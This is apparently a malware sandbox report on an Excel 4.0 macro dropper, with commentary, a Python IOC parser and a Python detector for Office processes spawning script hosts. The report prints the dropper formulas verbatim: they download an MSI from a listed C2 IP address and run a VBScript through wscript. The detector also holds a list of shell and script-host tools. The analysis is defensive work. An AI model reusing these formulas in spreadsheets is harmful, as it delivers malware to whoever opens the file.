General

  • Target

    27bf04a23d1e8e9211d8ac52d4e402fd

  • Size

    6KB

  • Sample

    231221-3lrypaddg2

  • MD5

    27bf04a23d1e8e9211d8ac52d4e402fd

  • SHA1

    e8bc0c80b2099eb4c51aeef9b5873bfb2974aa75

  • SHA256

    d360be15b2c924e258e65b96ad5b4cb755669c0f047dcd5d9e79ab7a156a4a47

  • SHA512

    244d6d42ed10ab1620565a7905ebf5c2c500434c4d112166d8492dfb12b97739b3d52a4b4b0e3e54183fc517ad5797fdcb2cdb89e71707093677021c11853296

  • SSDEEP

    192:NDSyuSgbrA2OmmfRz8UhHFBFYu1b98yhy+B:NFudM2wB1FYgb98yhp

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
    =EXEC("wscript C:\zer\spp.vbs")
    =HALT()
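
    Reading the extracted chain: CALL(dll, function, type_text, args...) invokes an exported
    Win32 function directly from the sheet. The first character of type_text is the return
    type and the rest describe the arguments, so "JJCCJJ" means int32 return, then
    (int32, char*, char*, int32, int32), which matches URLDownloadToFileA(pCaller, szURL,
    szFileName, dwReserved, lpfnCB). Both CALLs write to C:\~\pes.msi; the second URL points
    at google.com and will not serve an MSI, so it is best read as a fallback or decoy entry
    the extractor picked up rather than a second C2. EXEC then runs wscript on
    C:\zer\spp.vbs, a path no visible formula writes, so the report does not show how that
    script reaches disk. The parser below is an added example (not tooling from the sandbox
    or the page) that turns the formula text above into IOCs and flags that gap; the
    type-code table is a subset of the documented Excel 4.0 codes, and KNOWN_PARAMS carries
    the Windows SDK parameter names for URLDownloadToFileA.

```python
import re
from typing import Dict, List, Tuple

# Formulas exactly as the report's Malware Config section prints them (one run of text).
EXTRACTED_FORMULAS = (
    '=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\\~\\pes.msi",0,0) '
    '=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\\~\\pes.msi",0,0) '
    '=EXEC("wscript C:\\zer\\spp.vbs") '
    '=HALT()'
)

# Subset of Excel 4.0 CALL/REGISTER type_text codes; the first character is the return type.
TYPE_CODES = {"A": "bool16", "B": "double", "C": "char*", "D": "pascal-string",
              "I": "int16", "J": "int32"}

# Windows SDK parameter names for APIs seen in this dropper (keyed by lowercased dll, func).
KNOWN_PARAMS = {
    ("urlmon", "urldownloadtofilea"): ["pCaller", "szURL", "szFileName", "dwReserved", "lpfnCB"],
}


def split_formulas(text: str) -> List[str]:
    """Split a run of XLM formulas, as the sandbox prints them, into one formula per entry."""
    return [f.strip() for f in re.split(r"\s+(?==)", text.strip()) if f.strip()]


def split_args(argtext: str) -> List[str]:
    """Split a comma-separated argument list, ignoring commas inside double quotes."""
    if not argtext.strip():
        return []
    args, cur, in_str = [], [], False
    for ch in argtext:
        if ch == '"':
            in_str = not in_str
        elif ch == "," and not in_str:
            args.append("".join(cur))
            cur = []
            continue
        cur.append(ch)
    args.append("".join(cur))
    return [a.strip().strip('"') for a in args]


def parse_formula(formula: str) -> Tuple[str, List[str]]:
    """'=CALL("Urlmon",...)' -> ('CALL', ['Urlmon', ...])."""
    m = re.fullmatch(r"=\s*([A-Z.]+)\((.*)\)", formula.strip(), re.S)
    if not m:
        raise ValueError(f"not an XLM formula: {formula!r}")
    return m.group(1).upper(), split_args(m.group(2))


def decode_type_text(type_text: str) -> Tuple[str, List[str]]:
    """Decode a CALL type_text such as 'JJCCJJ' into (return type, [argument types])."""
    types = [TYPE_CODES.get(c, f"unknown({c})") for c in type_text]
    return types[0], types[1:]


def extract_iocs(text: str) -> Dict[str, list]:
    """Walk the formula chain and collect URLs, dropped paths, commands and consistency notes."""
    iocs = {"urls": [], "dropped_files": [], "commands": [], "api_calls": [], "notes": []}
    halted = False
    for formula in split_formulas(text):
        name, args = parse_formula(formula)
        if name == "CALL" and len(args) >= 3:
            dll, func, type_text, *call_args = args
            ret, arg_types = decode_type_text(type_text)
            names = KNOWN_PARAMS.get((dll.lower(), func.lower()),
                                     [f"arg{i}" for i in range(len(arg_types))])
            iocs["api_calls"].append({"dll": dll, "func": func, "returns": ret,
                                      "params": dict(zip(names, call_args))})
            if len(arg_types) != len(call_args):
                iocs["notes"].append(f"{func}: type_text declares {len(arg_types)} args, "
                                     f"formula passes {len(call_args)}")
            for value, typ in zip(call_args, arg_types):
                if typ == "char*" and re.match(r"https?://", value, re.I):
                    iocs["urls"].append(value)
                elif typ == "char*" and re.match(r"[A-Za-z]:\\", value):
                    iocs["dropped_files"].append(value)
        elif name == "EXEC" and args:
            iocs["commands"].append(args[0])
        elif name == "HALT":
            halted = True
    for key in ("urls", "dropped_files", "commands"):
        iocs[key] = list(dict.fromkeys(iocs[key]))  # de-duplicate, keep order
    if not halted:
        iocs["notes"].append("chain has no HALT; more cells may follow")
    written = {p.lower() for p in iocs["dropped_files"]}
    for cmd in iocs["commands"]:
        for path in re.findall(r'[A-Za-z]:\\[^\s"]+', cmd):
            if path.lower() not in written:
                iocs["notes"].append(f"EXEC runs {path}, which no visible CALL writes to disk")
    return iocs


if __name__ == "__main__":
    for key, value in extract_iocs(EXTRACTED_FORMULAS).items():
        print(f"{key}: {value}")
```

    Running it on the report's formulas yields the two URLs, the single drop path
    C:\~\pes.msi, the wscript command, and one note that C:\zer\spp.vbs is executed but never
    written by the visible chain.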

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Targets

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
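
    The first signature is what the EXEC formula produces at runtime: EXCEL.EXE becomes the
    parent of wscript.exe. The detector below is an added example (not the sandbox's own
    signature logic) of the same check over process-creation events in a Sysmon Event ID 1
    style shape; the events are constructed to mirror the report's chain, and the Office
    host and script-host lists are assumptions a team would tune.

```python
import re
from typing import Dict, List

# Office hosts that should not normally spawn script interpreters or shells.
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Children that indicate macro- or exploit-driven execution when parented by Office.
SCRIPT_OR_SHELL = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe",
                   "mshta.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe"}
SCRIPT_PATH = re.compile(r'[A-Za-z]:\\[^\s"]+\.(?:vbs|js|wsf|ps1|bat|cmd|hta|msi)\b', re.I)

# Constructed process-creation events (not from the report); the wscript line
# reproduces the command the extracted EXEC formula runs.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" C:\Users\user\Downloads\invoice.xls',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"pid": 5204, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript C:\zer\spp.vbs",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
    {"pid": 5310, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_office_child_processes(events: List[Dict]) -> List[Dict]:
    """Return one alert per event whose parent is an Office host and whose child is a script host or shell."""
    alerts = []
    for ev in events:
        parent, child = basename(ev["parent_image"]), basename(ev["image"])
        if parent in OFFICE_HOSTS and child in SCRIPT_OR_SHELL:
            alerts.append({
                "pid": ev["pid"],
                "parent": parent,
                "child": child,
                "cmdline": ev["cmdline"],
                # Script or installer paths on the command line are the follow-up artifacts to collect.
                "script_paths": SCRIPT_PATH.findall(ev["cmdline"]),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_office_child_processes(SAMPLE_EVENTS):
        print(alert)
```

    On the constructed events only the wscript launch is flagged, and the alert carries
    C:\zer\spp.vbs as the artifact to pull from the host alongside C:\~\pes.msi.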

MITRE ATT&CK Enterprise v15